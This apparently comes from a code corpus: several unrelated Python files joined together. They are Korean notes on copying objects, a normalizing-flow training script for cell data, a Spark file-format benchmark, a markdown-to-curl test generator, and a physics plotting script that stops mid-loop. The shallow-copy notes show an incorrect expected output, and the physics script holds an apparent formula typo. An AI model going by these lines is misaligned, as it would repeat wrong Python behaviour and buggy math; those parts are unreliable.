print(k, v) # apple green, banana yello
color.__delitem__('apple')
print(color)
color.clear()
print(color)
print('aaa')
# 얕은복사 vs 깊은복사
from copy import copy, deepcopy
a = [1, [1, 2, 3]]
b = copy(a)
# 얕은복사
# 겉을 감사는 복합객체를 생성되었지만 내부객체를 동일한 객체를 바라본다
print(id(a), id(a)) # 4511448192 4511448192
print(id(a[0]), id(a[1])) # 4509003536 4511825184
print(id(b[0]), id(b[1])) # 4509003536 4511825184
# 변경하려는 객체의 성격(변이, 불변) 에 따라 객체가 재할당되거나 참조객체가 수정된다.
b[0] = 100 # immutable
b[1][0] = 11 # mutable
print(a, b) # [1, [1, 2, 3]] [100, [1, 2, 3]]
print(id(a[0]), id(a[1])) # 4509003536 4511825184
print(id(b[0]), id(b[1])) # 4512185200 4511825184
# 깊은복사
# 모든 객체에 대해서 재할당한다.
c = deepcopy(a)
print(id(a), id(c)) # 4521155712 4521532384
print(id(a[0]), id(a[1])) # 4518706960 4521532704
print(id(c[0]), id(c[1])) # 4518706960 4521532624 |
<filename>train_scrna.py
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import argparse
import os
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import lib.utils as utils
from lib.visualize_flow import visualize_transform, visualize_growth
import lib.layers.odefunc as odefunc
from train_misc import standard_normal_logprob
from train_misc import set_cnf_options, count_nfe, count_parameters, count_total_time
from train_misc import add_spectral_norm, spectral_norm_power_iteration
from train_misc import create_regularization_fns, get_regularization, append_regularization_to_log
from train_misc import build_model_tabular
from diagnostics.viz_scrna import save_trajectory, trajectory_to_video, save_trajectory_density, save_vectors
SOLVERS = ["dopri5", "bdf", "rk4", "midpoint", 'adams', 'explicit_adams', 'fixed_adams']
parser = argparse.ArgumentParser('Continuous Normalizing Flow')
parser.add_argument('--test', type=eval, default=False, choices=[True, False])
parser.add_argument('--full_data', type=eval, default=True, choices=[True, False])
parser.add_argument('--data', type=str, default='dummy')
parser.add_argument(
"--layer_type", type=str, default="concatsquash",
choices=["ignore", "concat", "concat_v2", "squash", "concatsquash", "concatcoord", "hyper", "blend"]
)
parser.add_argument('--dims', type=str, default='64-64-64')
parser.add_argument("--num_blocks", type=int, default=1, help='Number of stacked CNFs.')
parser.add_argument('--time_length', type=float, default=0.5)
parser.add_argument('--train_T', type=eval, default=True)
parser.add_argument("--divergence_fn", type=str, default="brute_force", choices=["brute_force", "approximate"])
parser.add_argument("--nonlinearity", type=str, default="tanh", choices=odefunc.NONLINEARITIES)
parser.add_argument('--alpha', type=float, default=0.0, help="loss weight parameter for growth model")
parser.add_argument('--solver', type=str, default='dopri5', choices=SOLVERS)
parser.add_argument('--atol', type=float, default=1e-5)
parser.add_argument('--rtol', type=float, default=1e-5)
parser.add_argument("--step_size", type=float, default=None, help="Optional fixed step size.")
parser.add_argument('--test_solver', type=str, default=None, choices=SOLVERS + [None])
parser.add_argument('--test_atol', type=float, default=None)
parser.add_argument('--test_rtol', type=float, default=None)
parser.add_argument('--residual', type=eval, default=False, choices=[True, False])
parser.add_argument('--rademacher', type=eval, default=False, choices=[True, False])
parser.add_argument('--spectral_norm', type=eval, default=False, choices=[True, False])
parser.add_argument('--batch_norm', type=eval, default=False, choices=[True, False])
parser.add_argument('--bn_lag', type=float, default=0)
parser.add_argument('--niters', type=int, default=10000)
parser.add_argument('--num_workers', type=int, default=8)
parser.add_argument('--batch_size', type=int, default=1000)
parser.add_argument('--test_batch_size', type=int, default=1000)
parser.add_argument('--viz_batch_size', type=int, default=2000)
parser.add_argument('--lr', type=float, default=1e-3)
parser.add_argument('--weight_decay', type=float, default=1e-5)
# Track quantities
parser.add_argument('--l1int', type=float, default=None, help="int_t ||f||_1")
parser.add_argument('--l2int', type=float, default=None, help="int_t ||f||_2")
parser.add_argument('--dl2int', type=float, default=None, help="int_t ||f^T df/dt||_2") # f df/dx???
parser.add_argument('--dtl2int', type=float, default=None, help="int_t ||f^T df/dx + df/dt||_2")
parser.add_argument('--JFrobint', type=float, default=None, help="int_t ||df/dx||_F")
parser.add_argument('--JdiagFrobint', type=float, default=None, help="int_t ||df_i/dx_i||_F")
parser.add_argument('--JoffdiagFrobint', type=float, default=None, help="int_t ||df/dx - df_i/dx_i||_F")
parser.add_argument('--vecint', type=float, default=None, help="regularize direction")
parser.add_argument('--save', type=str, default='experiments/cnf')
parser.add_argument('--viz_freq', type=int, default=100)
parser.add_argument('--viz_freq_growth', type=int, default=100)
parser.add_argument('--val_freq', type=int, default=100)
parser.add_argument('--log_freq', type=int, default=10)
parser.add_argument('--gpu', type=int, default=0)
args = parser.parse_args()
# logger
utils.makedirs(args.save)
logger = utils.get_logger(logpath=os.path.join(args.save, 'logs'), filepath=os.path.abspath(__file__))
if args.layer_type == "blend":
logger.info("!! Setting time_length from None to 1.0 due to use of Blend layers.")
args.time_length = 1.0
logger.info(args)
device = torch.device('cuda:' + str(args.gpu) if torch.cuda.is_available() else 'cpu')
times = [args.time_length, 2*args.time_length]
import numpy as np
import atongtf.dataset as atd
from sklearn.preprocessing import StandardScaler
def load_data():
data = atd.EB_Velocity_Dataset()
labels = data.data['sample_labels']
ixs = data.data['ixs']
labels = labels[ixs]
scaler = StandardScaler()
scaler.fit(data.emb[ixs])
transformed = scaler.transform(data.emb[ixs])
return transformed, labels, scaler
def load_data_full():
data = atd.EB_Velocity_Dataset()
labels = data.data['sample_labels']
scaler = StandardScaler()
scaler.fit(data.emb)
transformed = scaler.transform(data.emb)
return transformed, labels, scaler
def load_circle_data():
data = atd.Circle_Transition_Dataset(n=10000)
labels = data.get_train_labels()
full_data = data.get_train()
transformed = full_data[:,:2]
next_states = full_data[:,2:]
directions = next_states - transformed
return transformed, labels, np.concatenate([transformed, directions], axis=1)
def load_gaussian_pair_data():
n, d = 10000, 2
scale = 1 / 5
#a= [np.ones(n // 2, d) * -1, np.ones(n // 2, d)]
y = np.concatenate([np.zeros(n // 2), np.ones(n // 2)], axis=0)
y_full = np.stack([y, np.zeros_like(y)], axis=1)
x = np.stack([y + scale * np.random.randn(n), scale * np.random.randn(n)], axis=1)
return x, y, None
def load_gaussian_curve_path():
n, d = 15000, 2
n = (n // 3) * 3 # Round N
scale = 1
#centers = [[1,0], [1,1], [1,2]]
y = np.repeat([0, 0.5, 2], repeats=n//3, axis=0)
y_full = np.stack([np.zeros_like(y), y], axis=1)
x = y_full + scale * np.random.randn(n, d)
return x, y, None
def load_gaussian_data():
n = 10000
mean = 3
x = np.random.randn(n,2) + mean * np.stack([np.ones(n), np.zeros(n)], axis=1)
return x, np.zeros(n), None
#data, labels, _ = load_gaussian_curve_path()
#data, labels, _ = load_gaussian_pair_data()
"""
import scprep
fig, ax = plt.subplots(1,1)
scprep.plot.scatter2d(data, c=labels, ax=ax)
#scprep.plot.scatter2d(np.random.randn(10000,2), ax=ax)
ax.set_aspect('equal')
plt.savefig('gaussians.png')
plt.close()
"""
#data, labels, data_and_directions = load_circle_data()
data, labels, scaler = load_data_full() if args.full_data else load_data()
timepoints = np.unique(labels)
#########
# SELECT TIMEPOINTS
#timepoints = timepoints[:2]
# Integration timepoints, where to evaluate the ODE
#int_tps = (timepoints+1) * args.time_length
int_tps = (np.arange(len(timepoints))+1.) * args.time_length
#########
def inf_sampler(arr, batch_size=None, noise=0.0):
if batch_size is None: batch_size = args.batch_size
ind = np.random.randint(len(arr), size=batch_size)
samples = arr[ind]
if noise > 0:
samples += np.random.randn(*samples.shape) * noise
return samples
def train_sampler(i):
return inf_sampler(data[labels==i, :], noise=0.1)
def dir_train_sampler(i):
return inf_sampler(data_and_directions[labels==i], noise=0.)
def val_sampler(i):
return inf_sampler(data[labels==i, :], batch_size=args.test_batch_size)
def viz_sampler(i):
return inf_sampler(data[labels==i, :], batch_size=args.viz_batch_size)
full_sampler = lambda: inf_sampler(data, 2000)
def scatter_timepoints():
import matplotlib.pyplot as plt
LOW = -4
HIGH = 4
fig, axes = plt.subplots(2,3, figsize=(20,10))
axes = axes.flatten()
titles = ['D00-03', 'D06-09', 'D12-15', 'D18-21', 'D24-27', 'Full']
for i in range(5):
ax = axes[i]
dd = np.concatenate([train_sampler(i) for _ in range(10)])
ax.hist2d(dd[:,0], dd[:,1], range=[[LOW,HIGH], [LOW,HIGH]], bins=100)
ax.invert_yaxis()
ax.set_aspect('equal')
ax.set_title(titles[i])
ax = axes[5]
ax.hist2d(data[:,0], data[:,1], range=[[LOW,HIGH], [LOW,HIGH]], bins=100)
ax.invert_yaxis()
ax.set_aspect('equal')
ax.set_title(titles[5])
plt.savefig('scatter.png')
plt.close()
#scatter_timepoints()
def get_transforms(model, integration_times):
"""
Given a list of integration points,
returns a function giving integration times
"""
def sample_fn(z, logpz=None):
int_list = [torch.tensor([it - args.time_length, it]).type(torch.float32).to(device)
for it in integration_times]
if logpz is not None:
# TODO this works right?
for it in int_list:
z, logpz = model(z, logpz, integration_times=it, reverse=True)
return z, logpz
else:
for it in int_list:
z = model(z, integration_times=it, reverse=True)
return z
def density_fn(x, logpx=None):
int_list = [torch.tensor([it - args.time_length, it]).type(torch.float32).to(device)
for it in integration_times[::-1]]
if logpx is not None:
for it in int_list:
x, logpx = model(x, logpx, integration_times=it, reverse=False)
return x, logpx
else:
for it in int_list:
x = model(x, integration_times=it, reverse=False)
return x
return sample_fn, density_fn
def compute_loss(args, model, growth_model):
"""
Compute loss by integrating backwards from the last time step
At each time step integrate back one time step, and concatenate that
to samples of the empirical distribution at that previous timestep
repeating over and over to calculate the likelihood of samples in
later timepoints iteratively, making sure that the ODE is evaluated
at every time step to calculate those later points.
The growth model is a single model of time independent cell growth /
death rate defined as a variation from uniform.
"""
# Backward pass accumulating losses, previous state and deltas
deltas = []
xs = []
zs = []
for i, (itp, tp) in enumerate(zip(int_tps[::-1], timepoints[::-1])): # tp counts down from last
integration_times = torch.tensor([itp-args.time_length, itp]).type(torch.float32).to(device)
# load data
x = train_sampler(tp)
x = torch.from_numpy(x).type(torch.float32).to(device)
xs.append(x)
if i > 0:
x = torch.cat((z, x))
zs.append(z)
zero = torch.zeros(x.shape[0], 1).to(x)
# transform to previous timepoint
z, delta_logp = model(x, zero, integration_times=integration_times)
deltas.append(delta_logp)
# compute log growth probability
xs = torch.cat(xs)
#growth_zs, growth_delta_logps = growth_model(xs, torch.zeros(xs.shape[0], 1).to(xs)) # Use default timestep
#growth_logpzs = uniform_logprob(growth_zs).sum(1, keepdim=True)
#growth_logpzs = standard_normal_logprob(growth_zs).sum(1, keepdim=True)
#growth_logpxs = growth_logpzs - growth_delta_logps
# compute log q(z) with forward pass
logpz = standard_normal_logprob(z).sum(1, keepdim=True)
logps = [logpz]
# build growth rates
growthrates = [torch.ones_like(logpz)]
for z_state, tp in zip(zs[::-1], timepoints[::-1][1:]):
full_state = torch.cat([z_state, tp * torch.ones(z_state.shape[0],1).to(z_state)], 1)
growthrates.append(growth_model(full_state))
losses = []
for gr, delta_logp in zip(growthrates, deltas[::-1]):
#logpx = logps[-1] - delta_logp# + gr
logpx = logps[-1] - delta_logp + torch.log(gr)
logps.append(logpx[:-args.batch_size])
losses.append(-torch.mean(logpx[-args.batch_size:]))
#weights = torch.tensor([1,1,10]).to(logpx)
#weights = torch.tensor([2,1]).to(logpx)
losses = torch.stack(losses)
weights = torch.ones_like(losses).to(logpx)
losses = torch.mean(losses * weights)
#losses = torch.mean(losses)
# Add a hinge loss on the growth model so that we prefer sums over the batch
# to be not too much more than 1 on average
reg = 0.
for gr in growthrates[1:]:
reg += F.relu(torch.mean(gr[-1000:])) # Only put a loss on the last portion with real data
#reg += F.relu(torch.mean(gr[-1000:]) - 1) # Only put a loss on the last portion with real data
#mean_growthrate = torch.mean(torch.cat(growthrates[1:]))
#reg = F.relu(mean_growthrate - 1)
#print(reg.item())
#losses += 3*reg
#losses += 0.001 * torch.mean(gr[-1000:] ** 2)
# Direction regularization
if args.vecint:
similarity_loss = 0
for i, (itp, tp) in enumerate(zip(int_tps, timepoints)):
itp = torch.tensor(itp).type(torch.float32).to(device)
x = dir_train_sampler(tp)
x = torch.from_numpy(x).type(torch.float32).to(device)
y,zz = torch.split(x, 2, dim=1)
y = y + torch.randn_like(y) * 0.1
# This is really hacky but I don't know a better way (alex)
direction = model.chain[0].odefunc.odefunc.diffeq(itp, y)
similarity_loss += 1 - torch.mean(F.cosine_similarity(direction, zz))
print(similarity_loss)
losses += similarity_loss * args.vecint
#loss = loss + vec_reg_loss
#growth_losses = -torch.mean(growth_logpxs)
#alpha = torch.tensor(args.alpha).to(growth_losses)
#loss = (1 - alpha) * losses + alpha * growth_losses
#loss = losses + growth_losses
return losses#, growth_losses
#return loss
def train(args, model, growth_model):
logger.info(model)
logger.info("Number of trainable parameters: {}".format(count_parameters(model)))
#optimizer = optim.Adam(set(model.parameters()) | set(growth_model.parameters()),
optimizer = optim.Adam(model.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
#growth_optimizer = optim.Adam(growth_model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
time_meter = utils.RunningAverageMeter(0.93)
loss_meter = utils.RunningAverageMeter(0.93)
nfef_meter = utils.RunningAverageMeter(0.93)
nfeb_meter = utils.RunningAverageMeter(0.93)
tt_meter = utils.RunningAverageMeter(0.93)
end = time.time()
best_loss = float('inf')
model.train()
growth_model.eval()
for itr in range(1, args.niters + 1):
optimizer.zero_grad()
#growth_optimizer.zero_grad()
### Train
if args.spectral_norm: spectral_norm_power_iteration(model, 1)
#if args.spectral_norm: spectral_norm_power_iteration(growth_model, 1)
loss = compute_loss(args, model, growth_model)
loss_meter.update(loss.item())
if len(regularization_coeffs) > 0:
# Only regularize on the last timepoint
reg_states = get_regularization(model, regularization_coeffs)
reg_loss = sum(
reg_state * coeff for reg_state, coeff in zip(reg_states, regularization_coeffs) if coeff != 0
)
loss = loss + reg_loss
#if len(growth_regularization_coeffs) > 0:
# growth_reg_states = get_regularization(growth_model, growth_regularization_coeffs)
# reg_loss = sum(
# reg_state * coeff for reg_state, coeff in zip(growth_reg_states, growth_regularization_coeffs) if coeff != 0
# )
# loss2 = loss2 + reg_loss
total_time = count_total_time(model)
nfe_forward = count_nfe(model)
loss.backward()
#loss2.backward()
optimizer.step()
#growth_optimizer.step()
### Eval
nfe_total = count_nfe(model)
nfe_backward = nfe_total - nfe_forward
nfef_meter.update(nfe_forward)
nfeb_meter.update(nfe_backward)
time_meter.update(time.time() - end)
tt_meter.update(total_time)
log_message = (
'Iter {:04d} | Time {:.4f}({:.4f}) | Loss {:.6f}({:.6f}) | NFE Forward {:.0f}({:.1f})'
' | NFE Backward {:.0f}({:.1f}) | CNF Time {:.4f}({:.4f})'.format(
itr, time_meter.val, time_meter.avg, loss_meter.val, loss_meter.avg, nfef_meter.val, nfef_meter.avg,
nfeb_meter.val, nfeb_meter.avg, tt_meter.val, tt_meter.avg
)
)
if len(regularization_coeffs) > 0:
log_message = append_regularization_to_log(log_message, regularization_fns, reg_states)
logger.info(log_message)
if itr % args.val_freq == 0 or itr == args.niters:
with torch.no_grad():
model.eval()
growth_model.eval()
test_loss = compute_loss(args, model, growth_model)
test_nfe = count_nfe(model)
log_message = '[TEST] Iter {:04d} | Test Loss {:.6f} | NFE {:.0f}'.format(itr, test_loss, test_nfe)
logger.info(log_message)
if test_loss.item() < best_loss:
best_loss = test_loss.item()
utils.makedirs(args.save)
torch.save({
'args': args,
'state_dict': model.state_dict(),
'growth_state_dict': growth_model.state_dict(),
}, os.path.join(args.save, 'checkpt.pth'))
model.train()
if itr % args.viz_freq == 0:
with torch.no_grad():
model.eval()
for i, tp in enumerate(timepoints):
p_samples = viz_sampler(tp)
sample_fn, density_fn = get_transforms(model, int_tps[:i+1])
#growth_sample_fn, growth_density_fn = get_transforms(growth_model, int_tps[:i+1])
plt.figure(figsize=(9, 3))
visualize_transform(
p_samples, torch.randn, standard_normal_logprob, transform=sample_fn, inverse_transform=density_fn,
samples=True, npts=100, device=device
)
fig_filename = os.path.join(args.save, 'figs', '{:04d}_{:01d}.jpg'.format(itr, i))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename)
plt.close()
#visualize_transform(
# p_samples, torch.rand, uniform_logprob, transform=growth_sample_fn,
# inverse_transform=growth_density_fn,
# samples=True, npts=800, device=device
#)
#fig_filename = os.path.join(args.save, 'growth_figs', '{:04d}_{:01d}.jpg'.format(itr, i))
#utils.makedirs(os.path.dirname(fig_filename))
#plt.savefig(fig_filename)
#plt.close()
model.train()
"""
if itr % args.viz_freq_growth == 0:
with torch.no_grad():
growth_model.eval()
# Visualize growth transform
growth_filename = os.path.join(args.save, 'growth', '{:04d}.jpg'.format(itr))
utils.makedirs(os.path.dirname(growth_filename))
visualize_growth(growth_model, data, labels, npts=200, device=device)
plt.savefig(growth_filename)
plt.close()
growth_model.train()
"""
end = time.time()
logger.info('Training has finished.')
def plot_output(args, model, growth_model=None):
save_traj_dir = os.path.join(args.save, 'trajectory')
logger.info('Plotting trajectory to {}'.format(save_traj_dir))
data_samples = full_sampler()
save_vectors(model, torch.tensor(inf_sampler(data[labels==0], batch_size=50)).type(torch.float32), data, labels,
args.save, device=device, end_times=int_tps, ntimes=100)
save_trajectory(model, data_samples, save_traj_dir, device=device, end_times=int_tps, ntimes=25)
trajectory_to_video(save_traj_dir)
#density_dir = os.path.join(args.save, 'density2')
#save_trajectory_density(model, data_samples, density_dir, device=device, end_times=int_tps, ntimes=100, memory=0.1)
#trajectory_to_video(density_dir)
if False and growth_model is not None:
print('Plotting growth model')
growth_filename = os.path.join(args.save, 'growth.jpg')
utils.makedirs(os.path.dirname(growth_filename))
visualize_growth(growth_model, data, labels, npts=200, device=device)
plt.savefig(growth_filename)
plt.close()
#save_traj_dir2 = os.path.join(args.save, 'trajectory_to_end')
#save_trajectory(model, data_samples, save_traj_dir2, device=device, end_times=[int_tps[-1]], ntimes=25)
#trajectory_to_video(save_traj_dir2)
class GrowthNet(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(3,64)
self.fc2 = nn.Linear(64,64)
self.fc3 = nn.Linear(64,1)
def forward(self, x):
x = F.leaky_relu(self.fc1(x))
x = F.leaky_relu(self.fc2(x))
x = self.fc3(x)
#x = F.tanh(self.fc3(x)) + 1
return x
if __name__ == '__main__':
regularization_fns, regularization_coeffs = create_regularization_fns(args)
growth_regularization_fns, growth_regularization_coeffs = create_regularization_fns(args)
model = build_model_tabular(args, 2, regularization_fns).to(device)
growth_model = torch.load('growth_model_v2.ckpt').to(device)
#growth_model = GrowthNet().to(device)
#growth_model = build_model_tabular(args, 2, growth_regularization_fns).to(device)
if args.spectral_norm: add_spectral_norm(model)
#if args.spectral_norm: add_spectral_norm(growth_model)
set_cnf_options(args, model)
#set_cnf_options(args, growth_model)
if args.test:
state_dict = torch.load(args.save + '/checkpt.pth')
model.load_state_dict(state_dict['state_dict'])
if 'growth_state_dict' not in state_dict:
print('error growth model note in save')
growth_model = None
else:
growth_model.load_state_dict(torch.load(args.save + '/checkpt.pth')['growth_state_dict'])
else:
train(args, model, growth_model)
plot_output(args, model, growth_model)
#plot_output(args, model, growth_model)
|
<filename>jobs/script.py
# spark-submit --packages org.apache.spark:spark-avro_2.12:3.0.1 script.py csv random_batch
# spark-submit --packages org.apache.spark:spark-avro_2.12:3.0.1 script.py parquet write
# du prints kb
# orc 191332 kb
# avro 286628 kb
# parquet 202772 kb
# csv 483432 kb
# json 1292192 kb
# write speed
# orc: 16.25 sec
# avro, write, 13.56
# parquet, write, 13.64
# json, write, 58.96
# csv, write, 13.25
# https://www.kaggle.com/netflix-inc/netflix-prize-data
import time
import argparse
import pyspark
from pyspark.sql import SparkSession
import os
import s3fs
def groupby(sdf):
return sdf.groupBy("rating").count()
def stats(sdf, field="rating"):
return sdf.agg({field: "max"}), sdf.agg({field: "min"}), sdf.agg({field: "count"})
def random_batch(sdf):
return sdf.sample(False, 0.05).collect()
def distinct(sdf):
return sdf.distinct().count()
def filtering(sdf, date="2005-11-15"):
return sdf.filter(sdf.date > date).count()
def get_op(op):
return {
"stats": stats,
"random_batch": random_batch,
"distinct": distinct,
"filtering": filtering,
"groupby": groupby,
}.get(op)
def read(fmt, spark):
json_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.json"
parquet_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.parquet"
avro_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.avro"
orc_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.orc"
csv_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.csv"
if fmt == "json":
sdf = spark.read.option("header", "true").json(json_data_path)
elif fmt == "csv":
sdf = spark.read.option("header", "true").csv(csv_data_path)
elif fmt == "avro":
sdf = spark.read.format("avro").option("header", "true").load(avro_data_path)
elif fmt == "parquet":
sdf = spark.read.option("header", "true").parquet(parquet_data_path)
return sdf
def write(sdf, fmt, name="generated-nf"):
sdf = sdf.withColumnRenamed("_c0", "user_id") \
.withColumnRenamed("_c1", "rating") \
.withColumnRenamed("_c2", "date")
if fmt == "json":
sdf.write.option("header", "true").json("{}.json".format(name))
elif fmt == "csv":
sdf.write.option("header", "true").csv("{}.csv".format(name))
elif fmt == "avro":
sdf.write.format("avro").option("header", "true").save("{}.avro".format(name))
elif fmt == "parquet":
sdf.write.option("header", "true").parquet("{}.parquet".format(name))
elif fmt == "orc":
sdf.write.option("header", "true").orc("{}.orc".format(name))
else:
print("Can't find matched format. Stop spark")
def mute_spark_logs(sc):
"""Mute Spark info logging"""
logger = sc._jvm.org.apache.log4j
logger.LogManager.getLogger("org").setLevel(logger.Level.ERROR)
logger.LogManager.getLogger("akka").setLevel(logger.Level.ERROR)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("fmt", type=str)
parser.add_argument("op", type=str)
args = parser.parse_args()
endpoint = "https://" + os.environ['AWS_S3_ENDPOINT']
fs = s3fs.S3FileSystem(client_kwargs={'endpoint_url': endpoint})
fs.info('pengfei/pengfei_test')
spark = SparkSession.builder.master("k8s://https://kubernetes.default.svc:443").appName("Evaluate data format") \
.config("spark.kubernetes.container.image", "inseefrlab/jupyter-datascience:master") \
.config("spark.kubernetes.authenticate.driver.serviceAccountName", os.environ['KUBERNETES_SERVICE_ACCOUNT']) \
.config("spark.executor.instances", "5") \
.config("spark.kubernetes.namespace", os.environ['KUBERNETES_NAMESPACE']) \
.config("spark.jars.packages", "org.apache.spark:spark-avro_2.12:3.0.1") \
.getOrCreate()
mute_spark_logs(spark.sparkContext)
sdf = read("csv", spark)
sdf.show(5)
start = time.time()
write(sdf, args.fmt)
# get_op(args.op)(sdf)
print("{}, {}, {}".format(args.fmt, args.op, time.time() - start))
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
import os
import re
import json
import random
reload(sys)
sys.setdefaultencoding("utf8")
def endCase(turlFile, case):
caseStr = ""
caseStr += "curl -X" + case["method"] + " 'http://default-host" + case["path"] + "?1=1"
for param in case["params"]:
if param["required"]:
caseStr += "&" + param["name"] + "=1111111"
caseStr += "' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: zh-CN' -H 'token: ...' -H 'Content-Type: application/json;charset=utf-8' -H 'Cookie: ...' --compressed --insecure"
if case["req"] is not None:
caseStr += " -d '" + case["req"] + "'"
caseStr += "\n\n" + case["res"] + "\n\n"
turlFile.write(caseStr + "\n")
mainTURL = ""
mdFileNames = [fileName for fileName in os.listdir(".") if re.match(".*.md", fileName) and fileName != "README.md"]
for mdFileName in mdFileNames:
mainTURL += "X " + mdFileName[:-3] + "\n\n(" + mdFileName[:-3] + ".turl)\n\n"
mdFile = open(mdFileName)
turlFile = open(mdFileName[:-3] + ".turl", "w")
state = "INIT"
currentCase = None
for line in mdFile.readlines():
line = line.strip()
if state == "INIT":
if line.startswith("# "):
state = "AWAITING_MODULE"
elif state == "AWAITING_MODULE":
if line.startswith("# "):
turlFile.write("X.X " + line[2:] + "\n")
state = "AWAITING_CASE"
elif state == "AWAITING_CASE":
if line.startswith("## "):
turlFile.write("X.X.X " + line[3:] + "\n")
currentCase = { "req": None, "params": [] }
state = "IN_CASE"
elif state == "IN_CASE":
if line.startswith("**"):
if line.startswith("**接口地址**"):
currentCase["path"] = line[line.find("`") + 1:-1]
elif line.startswith("**请求方式**"):
currentCase["method"] = line[line.find("`") + 1:-1]
elif line.startswith("**请求示例**"):
state = "AWAITING_REQ"
elif line.startswith("**请求参数**"):
state = "AWAITING_PARAMS"
elif line.startswith("**响应示例**"):
state = "AWAITING_RES"
elif line.startswith("# "):
endCase(turlFile, currentCase)
currentCase = None
turlFile.write("X.X " + line[2:] + "\n")
state = "AWAITING_CASE"
elif line.startswith("## "):
endCase(turlFile, currentCase)
currentCase = None
turlFile.write("X.X.X " + line[3:] + "\n")
currentCase = { "req": None, "params": [] }
state = "IN_CASE"
elif state == "AWAITING_REQ":
if line.startswith("{") or line.startswith("["):
currentCase["req"] = line
state = "IN_REQ"
elif state == "IN_REQ":
if line.startswith("`"):
state = "IN_CASE"
else:
currentCase["req"] += line
elif state == "AWAITING_PARAMS":
if line.startswith("| -"):
state = "IN_PARAMS"
elif line == "暂无":
state = "IN_CASE"
elif state == "IN_PARAMS":
if len(line) < 1:
state = "IN_CASE"
else:
paramParts = line.split("|")
currentCase["params"].append({ "name": paramParts[1].replace(" ", ""), "in": paramParts[3], "required": paramParts[4] == "true", "type": paramParts[5] })
elif state == "AWAITING_RES":
if line.startswith("{") or line.startswith("["):
currentCase["res"] = line
state = "IN_RES"
elif state == "IN_RES":
if line.startswith("`"):
state = "IN_CASE"
else:
currentCase["res"] += line
if currentCase is not None:
endCase(turlFile, currentCase)
currentCase = None
turlFile.close()
mdFile.close()
mainFile = open("testcases.turl", "w")
mainFile.write(mainTURL)
mainFile.close()
|
<reponame>mattWheeler1/spin-1<filename>diagnostics/plots/kibble-zurek/1d_spin-nematic_eigenvalues.py
import h5py
import numpy as np
import matplotlib.pyplot as plt
from numpy import conj
from numpy.fft import fft, ifft, ifftshift
# Load in data
filename_prefix = '1d_polar-BA-FM_5000'
data_file = h5py.File('../../../data/1d_kibble-zurek/{}.hdf5'.format(filename_prefix), 'r')
# Loading grid array data:
x = data_file['grid/x'][...]
Nx = len(x)
dx = x[1] - x[0]
dkx = np.pi / (Nx / 2 * dx)
kx = np.arange(-Nx // 2, Nx // 2) * dkx
box_radius = int(np.ceil(np.sqrt(Nx ** 2) / 2) + 1)
center_x = Nx // 2
time = data_file['time/t'][:, 0]
# Generate figure
fig, ax = plt.subplots()
# ax.set_ylim(0, 1.1)
ax.set_ylabel(r'$\lambda_Q (r)$')
ax.set_xlabel(r'$x / \xi_s$')
# Loading wavefunction data
psi_plus = data_file['wavefunction/psi_plus'][:, -1]
psi_0 = data_file['wavefunction/psi_0'][:, -1]
psi_minus = data_file['wavefunction/psi_minus'][:, -1]
# Calculate densities
n_plus = abs(psi_plus) ** 2
n_0 = abs(psi_0) ** 2
n_minus = abs(psi_minus) ** 2
n = abs(psi_plus) ** 2 + abs(psi_0) ** 2 + abs(psi_minus) ** 2
Q_xx = fft(np.real(conj(psi_plus) * psi_minus) - 0.5 * (n_plus + n_minus) + n / 3)
Q_yy = fft(-np.real(conj(psi_plus) * psi_minus) - 0.5 * (n_plus + n_minus) + n / 3)
Q_zz = fft(-n_0 + n / 3)
Q_xy = fft(np.imag(conj(psi_plus) * psi_minus))
Q_xz = fft(-np.sqrt(2.) / 4 * (psi_0 * (conj(psi_minus - psi_minus)) + conj(psi_0) * (psi_minus - psi_plus)))
Q_yz = fft(-1j * np.sqrt(2.) / 4 * (psi_0 * (conj(psi_minus + psi_minus)) - conj(psi_0) * (psi_minus + psi_plus)))
# Calculate Q_tilde
Qt_xx = (1 / Nx * ifftshift(ifft(Q_xx * conj(Q_xx) + Q_xy * conj(Q_xy) + Q_xz * conj(Q_xz)))).real
Qt_xy = (1 / Nx * ifftshift(ifft(Q_xx * conj(Q_xy) + Q_xy * conj(Q_yy) + Q_xz * conj(Q_yz)))).real
Qt_xz = (1 / Nx * ifftshift(ifft(Q_xx * conj(Q_xz) + Q_xy * conj(Q_yz) + Q_xz * conj(Q_zz)))).real
Qt_yx = (1 / Nx * ifftshift(ifft(Q_xy * conj(Q_xx) + Q_yy * conj(Q_xy) + Q_yz * conj(Q_xz)))).real
Qt_yy = (1 / Nx * ifftshift(ifft(Q_xy * conj(Q_xy) + Q_yy * conj(Q_yy) + Q_yz * conj(Q_yz)))).real
Qt_yz = (1 / Nx * ifftshift(ifft(Q_xy * conj(Q_xz) + Q_yy * conj(Q_yz) + Q_yz * conj(Q_zz)))).real
Qt_zx = (1 / Nx * ifftshift(ifft(Q_xz * conj(Q_xx) + Q_yz * conj(Q_xy) + Q_zz * conj(Q_xz)))).real
Qt_zy = (1 / Nx * ifftshift(ifft(Q_xz * conj(Q_xy) + Q_yz * conj(Q_yy) + Q_zz * conj(Q_yz)))).real
Qt_zz = (1 / Nx * ifftshift(ifft(Q_xz * conj(Q_xz) + Q_yz * conj(Q_yz) + Q_zz * conj(Q_zz)))).real
eigenvalues_1 = []
eigenvalues_2 = []
eigenvalues_3 = []
eigenvector_1 = []
eigenvector_2 = []
eigenvector_3 = []
for index in range(Nx):
Qt = np.matrix([[Qt_xx[index], Qt_xy[index], Qt_xz[index]],
[Qt_yx[index], Qt_yy[index], Qt_yz[index]],
[Qt_zx[index], Qt_zy[index], Qt_zz[index]]])
w, v = np.linalg.eig(Qt)
eigenvalues_1.append(w[0])
eigenvector_1.append(v[0])
eigenvalues_2.append(w[1])
eigenvector_2.append(v[1])
eigenvalues_3.append(w[2])
